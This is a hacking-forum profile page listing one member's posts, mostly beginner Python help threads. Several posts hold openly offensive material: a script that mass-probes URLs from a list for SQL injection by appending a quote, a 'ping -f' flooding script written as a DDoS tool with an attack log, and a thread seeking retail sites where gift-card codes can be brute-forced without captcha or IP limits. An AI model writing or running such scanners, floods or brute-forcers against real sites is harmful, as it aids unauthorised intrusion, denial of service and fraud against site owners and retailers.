Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - Coto

Pages: [1] 2
1
Beginner's Corner / Re: SQL Injection Vulnerability in Python
« on: February 19, 2016, 09:51:09 pm »
Quote from: gray-fox on February 19, 2016, 07:02:03 pm
Function readlines() puts lines of file to list, so when you do:
Code: [Select]
r = requests.get(content+"'")
You are trying to add string " ' " to a list and request whole list. I wonder how you didn't get error there?
Basically you should do something like this:

Code: [Select]
import requests
with open("URL_list.txt", 'r') as f:
    content = f.readlines()

for url in content:
   #strip() strips newline characters.
    if "SQL" in requests.get(url.strip()+"'").content:
        print '\033[1;31mVulnerable!'
    else:
        print '\033[1;32mFailed.'



Using with statement when opening file is good practise to do because it handles files closing etc.
That..
Code: [Select]
str(tosearch)
..doesn't do anything. Or atleast it doesn't save what it does to anywhere, also it's pointless because 'tosearch' -variable is string already.


Thanks mate, that worked! However, after a few executions of the File, I'm facing this output when I run the .py file from Terminal:

Code: [Select]
Traceback (most recent call last):
  File "rgsr.py", line 7, in <module>
    if "SQL" in requests.get(url.strip()+"'").content:
  File "/usr/lib/python2.7/dist-packages/requests/api.py", line 67, in get
    return request('get', url, params=params, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/api.py", line 53, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 468, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 576, in send
    r = adapter.send(request, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/adapters.py", line 437, in send
    raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPConnectionPool(host='www.angelvestgroup.com', port=80): Max retries exceeded with url: /info.php?id=1' (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0x7fa2d5a5ca50>: Failed to establish a new connection: [Errno -2] Name or service not known',))

EDIT: Never mind, after paying close attention to the output, I saw that the link just doesn't exists. Is there a way I can add an elif statement to my Code, to say if the Site doesn't exist at all?

2
Beginner's Corner / Re: SQL Injection Vulnerability in Python
« on: February 19, 2016, 06:23:35 pm »
What do you mean?

I'm just trying to make the program check first line, add a ' at the end of it, and if the "SQL" exists in the Page Sources, print "Valid".

If not, print "Failed".

After doing it with the first line, then do it to the second line, third etc.

3
Beginner's Corner / Re: SQL Injection Vulnerability in Python
« on: February 19, 2016, 05:18:59 pm »
Nope, again, still only reading first line.

4
Beginner's Corner / SQL Injection Vulnerability in Python
« on: February 19, 2016, 04:53:47 pm »
Please use the following template:

[Problem]

I can't get this Python script to work.

[Background]

The Program reads every line from File and checks wether it's vulnerable of SQL Injections or not.

[Things I have tried]

Editing the Code a bit.

[Where I am stuck]

Can't get it to import from URL_list.txt and read each line and perform the check for vulnerability on each line (of the File containing the URLs).

My Python 2.7 Code:

Code: [Select]
import requests

with open("URL_list.txt") as f:
    content = f.readlines()

r = requests.get(content+"'")
if "SQL" in (r.content):
print '\033[1;31mVulnerable!'
else:
print '\033[1;32mFailed.'

5
Hacking and Security / Re: Brute-Forcing Gift-Cards Codes?
« on: February 07, 2016, 05:57:10 pm »
I wasn't planning on doing this using Hydra, I have made a Python Script that works just as fine. Maybe Hydra is actually faster on that, but if you've got the time to wait, it could work. I haven't thought about the Proxy though.

I'm actually looking for Sites that allow you to redeem gift cards that don't require big codes, just small ones and that don't require you to change your IP every time/ask for captcha. If you can find any, let me know! :)

6
Hacking and Security / Re: Where to get started?
« on: January 27, 2016, 10:49:04 pm »
Just because others are calling you stupid, it doesn't make them smart(er than you). Begin with the reason you want to learn how to Hack. If your current Goal for example is to crack a Wi-Fi password, learn that, or whatever. That's what got me into hacking the first place, after years I achieved this goal, but while trying, I learned lots of things.

7
Hacking and Security / Re: Brute-Forcing Gift-Cards Codes?
« on: January 20, 2016, 07:05:13 pm »
Thanks, what about other Retailer's Gift-Card's systems? When you buy for example an iTunes Gift-Card from the Store next to your house, does the guy working there enable it as soon as you purchase it, or something?

8
Hacking and Security / Brute-Forcing Gift-Cards Codes?
« on: January 19, 2016, 03:46:33 pm »
I was looking at Amazon's Gift-Card System. I know there are many Major Companies that sell you Gift-Cards for their Services. I was wondering, weather those Gift-Card Codes existed, so you could guess it and apply it? Or when you purchase the Gift-Card it gets enabled to be able to be redeemed by the buyer? If not, couldn't someone just brute-force Amazon's Gift Card System? For example, input the Wordlist which would have Amazon's Gift-Card Code Format, then get tons of Gift-Cards, meaning it would make the Brute-Forcer rich...

So, I was wondering weather Gift-Cards Codes get enabled on Purchase or not.

9
Beginner's Corner / Ping of Death - Works or not?
« on: January 17, 2016, 05:08:02 pm »
I had recently heard about "Ping of Death". It was known to act like a DDoS tool, by Pinging and sending threads to the victim Server.

I made something like that in Python:

Code: [Select]
#!/bin/sh

import time
import requests
import os

server = raw_input("Server to perform the DDoS Attack on [IP/URL]: ")
connections = input("Connections [1-100]: ")
downtime = float(raw_input("Downtime [in seconds]: "))

if '.' in server:
for x in range(0, connections):
os.system("gnome-terminal -e 'ping -f %s'" % str(server))
else:
print(server+ "is not a valid IP/URL.")
exit()

time.sleep(downtime)
print(" ")
print("\033[1;32;40mAttack has been successfully completed!")
print(" ")
print("\033[1;31;40mServer's Downtime:"),
print("\033[1;35;40m%s") % (downtime)
print(" ")
print("\033[1;36;40mSaving Output..."),
try:
f = open('Attack_History.txt','a')
except:
f = open('Attack_History.txt','w')
f.write('Server: '+server+'\n')
f.write('Connections: %s''\n' % str(connections))
f.write('Downtime: %s Seconds''\n' % str(downtime))
f.write("+------------------------+")
f.write('\n')
f.close()
time.sleep(5)
os.system("pkill terminal")
But it doesn't seem to work, even on very "weak" Websites, that I've tried DoSing with other ways and have worked. I opened up EtherApe and noticed that all the attacks were reflected on me. Just like a distributed reflective denial of service. Why does this happen? And is it possible to take down a site by using Ping?

10
Scripting Languages / Re: Python Code Help
« on: January 16, 2016, 08:54:15 pm »
Also, what if I also want to specify an input with Timeout?

This is what I've done:

server = raw_input("Server to perform the Ping on [IP/URL]: ")
timeout = raw_input("Ping length time [Seconds]: ")

os.system("gnome-terminal -e 'ping -w %d -i 2 %s'" % str(server) % str(timeout))

So, basically, I also wanna fit the timeout string too. How do I do that? (The above code obv. doesn't work)

Also, how do I get all that code into a

for x in range(0, 3): ? So that it would open 3 Terminal windows and do that Ping.

It surprisingly didn't work for me for some reason, where as it just did before...  :o

11
Scripting Languages / Re: Python Code Help
« on: January 16, 2016, 07:57:57 pm »
Yea, I'm using Python 2.7, not 3.

12
Scripting Languages / Re: Python Code Help
« on: January 16, 2016, 01:41:31 pm »
Quote from: TheWormKill on January 16, 2016, 12:24:21 pm
I won't tell you what you did wrong because you obv. didn't do any basic debugging of your script.
However, I recommend that you print the stuff you pass to the os.system() call. If you are done with that, come back here and post your working code, as I see it will have some room for improvements.

I've got everything to work. What's troubling me, however, is I want the script to ask for the URL to ping, and use what I've responded here:

os.system("gnome-terminal -e 'ping -i 2' + str(server)")
as in
os.system("gnome-terminal -e 'ping -i 2' + [URL I responded to the Terminal asking for the URL to ping]")

13
Scripting Languages / Python Code Help
« on: January 16, 2016, 12:19:15 pm »
Hey, folks. I wanted to make a script, where you input a URL, and the Terminal Pings it.

My current Code:

Code: [Select]
server = input("Server to perform the Ping on: ")

os.system("gnome-terminal -e 'ping -i 2' + str(server)")
But it doesn't work, no matter what I try... I want it to work like the way I've coded it, above, because there's a bunch more lines behind this, but this is where I need help.

Thanks.

14
Science / Re: [URGENT] Chemistry Homework Help
« on: January 11, 2016, 12:24:22 am »
Ty m8!!

I'm sure I'll get an A+!  ;D ;D ;D

15
Science / [URGENT] Chemistry Homework Help
« on: January 10, 2016, 08:55:34 pm »
Alright, I got this exercise in Chemistry, I need to have it finished by tomorrow or else I might fail the subject... If anyone could PLEASE fill the table below, that would be amazing and I'd really appreciate it..

I assume most of you would know what to do, unlike me (P.S. Please don't bother explain me how to do all this, I need this finished ASAP, like right now...) :P

OH-O-2Cl-Br-F-I-NO3-CO3-2SO4-2PO4-3CN-HCO3-MnO4-
H+
K+
Na+
Ag+
Ba+2
Ca+2
Mg+2
Zn+2
Al+3
Fe+2
Fe+3
ZH4+2

Pages: [1] 2